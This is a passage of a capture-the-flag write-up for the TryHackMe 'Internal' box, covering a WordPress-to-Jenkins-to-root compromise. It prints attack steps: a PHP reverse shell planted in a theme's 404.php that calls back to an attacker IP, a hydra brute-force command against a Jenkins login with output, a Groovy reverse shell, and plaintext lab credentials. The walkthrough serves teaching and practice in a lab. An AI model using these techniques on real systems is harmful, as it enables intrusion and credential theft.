</div>
<p>We’ll edit the template for <code>404.php</code> and drop in a revshell created quickly and easily with EzpzShell.py. </p>
<p>If you want to learn more about <strong><code>ezpzshell</code></strong>, check out my previous blog post:</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Learn More</strong>: <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="URL" data-id="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" target="_blank" rel="noreferrer noopener">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation</a></p>
<p><code>ezpz 10.6.2.23 8888 php</code> (<code>ezpzshell</code> also automatically starts a listener)</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="404" height="238" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-242.png" alt="" class="wp-image-1142014" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-242.png 404w, https://blog.finxter.com/wp-content/uplo...00x177.png 300w" sizes="(max-width: 404px) 100vw, 404px" /></figure>
</div>
<p>After copying the payload to <code>404.php</code>, we make sure it is saved and then trigger the payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php</pre>
<p>And if everything is set up correctly, we will catch the revshell with <code>ezpz</code> as user: <code>www-data</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="407" height="177" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-243.png" alt="" class="wp-image-1142019" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-243.png 407w, https://blog.finxter.com/wp-content/uplo...00x130.png 300w" sizes="(max-width: 407px) 100vw, 407px" /></figure>
</div>
<h2>STABILIZE THE SHELL</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="738" height="488" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-251.png" alt="" class="wp-image-1142219" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-251.png 738w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w" sizes="(max-width: 738px) 100vw, 738px" /></figure>
</div>
<p>The following command will stabilize the shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python3 -c 'import pty;pty.spawn("/bin/bash")'</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="411" height="177" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-247.png" alt="" class="wp-image-1142078" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-247.png 411w, https://blog.finxter.com/wp-content/uplo...00x129.png 300w" sizes="(max-width: 411px) 100vw, 411px" /></figure>
</div>
<h2>INTERNAL ENUMERATION – FIND USER CREDS</h2>
<p>We discover a txt file with credentials:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat wp-save.txt Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
</pre>
<p>Let’s try switching users to <code>aubreanna</code> with the password given in <code>wp-save.txt</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">su aubreanna</pre>
<p>We are in as user <code>aubreanna</code> and immediately find the user flag.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">aubreanna@internal:~$ cat us cat user.txt THM{i—------omitted--------1}
</pre>
<h2>MORE ENUMERATION – DISCOVER A JENKINS SERVICE</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080
</pre>
<h2>SET UP PORT FORWARDING VIA SSH LOGIN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="735" height="480" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-252.png" alt="" class="wp-image-1142227" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-252.png 735w, https://blog.finxter.com/wp-content/uplo...00x196.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 8080:172.17.0.2:8080 [email protected]</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="570" height="631" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-246.png" alt="" class="wp-image-1142074" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-246.png 570w, https://blog.finxter.com/wp-content/uplo...71x300.png 271w" sizes="(max-width: 570px) 100vw, 570px" /></figure>
</div>
<p>SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the <a href="https://blog.finxter.com/tryhackme-alfred-how-i-solved-the-challenge/" data-type="post" data-id="1000191" target="_blank" rel="noreferrer noopener">Jenkins</a> login page in our browser.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="781" height="672" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-245.png" alt="" class="wp-image-1142071" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-245.png 781w, https://blog.finxter.com/wp-content/uplo...00x258.png 300w, https://blog.finxter.com/wp-content/uplo...68x661.png 768w" sizes="(max-width: 781px) 100vw, 781px" /></figure>
</div>
<h2>BRUTE-FORCE THE LOGIN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="741" height="487" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-253.png" alt="" class="wp-image-1142235" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-253.png 741w, https://blog.finxter.com/wp-content/uplo...00x197.png 300w" sizes="(max-width: 741px) 100vw, 741px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'</pre>
<p>The payload on this command has three parts:</p>
<ol>
<li><code>http-post-form</code> + <code>header</code></li>
<li>the request, edited with admin as the username and <code>^PASS^</code> in place of the password to mark it as the variable for the password wordlist</li>
<li>the error message that the website will return with a wrong password </li>
</ol>
<p><strong>Output:</strong></p>
<pre class="wp-block-preformatted"><code>Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10</code>
</pre>
</p>
<p>Credentials found! <code>admin
pongebob</code></p><h2>ENUMERATING JENKINS AS ADMIN</h2>
<p>We’ll use the script console on Jenkins to spawn another revshell using <em>groovy scripting language</em>. </p>
<p>We’ll use <code>ezpzshell</code> and choose the Java code, because <em>groovy </em>is built on Java. This time when we catch it, we will be user <code>jenkins</code>. </p>
<p>Manually enumerating through the file system we stumble across a <code>note.txt</code>. Let’s check out the contents:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat note.txt</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123
</code></pre>
<p>Bingo! We found root user credentials! </p>
<h2>SWITCH USERS TO ROOT</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="403" height="208" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-244.png" alt="" class="wp-image-1142068" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-244.png 403w, https://blog.finxter.com/wp-content/uplo...00x155.png 300w" sizes="(max-width: 403px) 100vw, 403px" /></figure>
</div>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="707" height="943" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-254.png" alt="" class="wp-image-1142241" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-254.png 707w, https://blog.finxter.com/wp-content/uplo...25x300.png 225w" sizes="(max-width: 707px) 100vw, 707px" /></figure>
</div>
<p>I’m not convinced yet that <code>pentest.ws</code> will save me much time on my note taking. Maybe with time and experience it would help. </p>
<p>I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform. </p>
<p>However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords. </p>
<p>Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended</strong>: <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="URL" data-id="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" target="_blank" rel="noreferrer noopener">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation</a></p>
</div>
https://www.sickgaming.net/blog/2023/02/...wordpress/